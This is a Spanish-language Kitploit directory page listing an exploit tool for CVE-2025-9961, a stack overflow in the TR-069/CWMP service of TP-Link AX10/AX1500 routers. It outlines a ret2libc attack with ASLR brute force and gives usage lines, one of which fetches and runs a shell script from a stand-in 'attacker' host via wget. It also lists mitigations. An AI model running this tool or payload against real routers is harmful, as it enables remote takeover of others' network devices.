Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-9961 | Kitploit
Herramientas/GitHubGitHub/yt2w/cve-2025-9961
Seguridad de Sistemas EmbebidosSeguridad IoTAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónSeguridad de HardwareHerramienta de Acceso RemotoExplotación de Binarios
GitHubyt2w/cve-2025-9961

CVE-2025-9961

Ver Repositorio
61hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-9961

TP-Link AX10/AX1500 CWMP Desbordamiento de búfer RCE

Descripción general

Desbordamiento de búfer basado en pila en CWMP (TR-069) que conduce a la ejecución remota de código.

CampoValor
ProductoTP-Link AX10, AX1500
AfectadosAX10 < 1.2.1, AX1500 < 1.3.11
CVSS8.6 (Alta)
TipoDesbordamiento de búfer de pila
VectorCWMP/TR-069 (puerto 7547)
ImpactoEjecución remota de código

Flujo de ataque

root@kitploit:~
flowchart LR
    A[Attacker] --> B["Malicious ACS"]
    B --> C["SetParameterValues"]
    C --> D["Stack Overflow"]
    D --> E["Overwrite PC"]
    E --> F["ret2libc"]
    F --> G["system()"]
    G --> H["RCE"]

Detalles técnicos

La vulnerabilidad está en el proceso cwmp al manejar solicitudes SOAP SetParameterValues. La entrada se utiliza para calcular el tamaño del búfer sin comprobar los límites.

Explotación:

  • Usa ret2libc para llamar a system()
  • Evasión de ASLR mediante fuerza bruta
  • Los reinicios del servicio permiten intentos repetidos

Uso

root@kitploit:~
python exploit.py <target_ip> --check-only

python exploit.py 192.168.0.1 --dos

python exploit.py 192.168.0.1 -c "wget http://attacker/shell.sh -O /tmp/s; sh /tmp/s"

Parámetros

Requisitos

Ninguno (usa la biblioteca estándar)

Mitigación

  • Actualiza al firmware parcheado
  • Deshabilita TR-069/CWMP
  • Restringe el acceso al puerto 7547

Aviso legal

Solo para pruebas de seguridad autorizadas.

Descargar herramienta
OpciónDescripciónPor defecto
-p, --portPuerto CWMP7547
-c, --commandComando para RCEnone
-t, --timeoutTiempo de espera del socket10
--dosSolo modo DoSoff
--check-onlyComprobar si es vulnerableoff